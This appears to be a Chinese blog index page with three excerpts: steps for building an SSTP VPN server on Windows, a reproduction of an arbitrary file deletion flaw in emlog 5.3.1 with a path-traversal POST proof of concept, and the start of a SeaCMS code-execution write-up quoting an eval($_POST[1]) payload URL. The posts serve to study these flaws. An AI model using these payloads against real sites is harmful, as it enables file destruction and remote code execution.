Windows 搭建SSTP服务器

折腾了2个小时,可算弄好了,现在记录下,担心忘记;

环境:Windows2008 及以上

用到的工具:Internet Information Services (IIS) 6.0 Resource Kit Tools

首先在服务器上安装远程路由访问

然后生成证书:

selfssl.exe /N:cn=证书名称 /V:3650

将生成好的证书安装到本地

在HOSTS文件中增加一行

VPN服务器的IP         证书名称

拨号的地址填写为:证书名称

emlog个人博客系统存在任意文件删除

作者:BRST.末于

地址:http://forum.vul.li/thread-62-1-1.html

今天群里表哥发的一个漏洞链接

本着学习的态度小弟来复现看看
一个很鸡肋的漏洞,需要后台权限
emlog5.3.1 漏洞发生/src/admin/data.php 文件
直接上代码吧

if ($action == ‘dell_all_bak’) {

if (!isset($_POST[‘bak’])) {
emDirect(‘./data.php?error_a=1’);
} else{
foreach ($_POST[‘bak’] as $val) {//可以看到未经过滤就直接删除

unlink($val);
}
emDirect(‘./data.php?active_del=1’);
}
}

POC:

POST

/emlog/admin/data.php?action=dell_all_bak

bak[]=../a.txt

海洋cms v6.33代码执行

作者:BRST.风疏

地址:http://forum.vul.li/thread-57-1-1.html

网上看到v6.28的代码执行,想看看厂商怎么修复的,然后对比了下两个版本代码

v6.28的为

/search.php?searchtype=5&tid=&area=eval($_POST[1])

对比两个版本的 继续阅读 »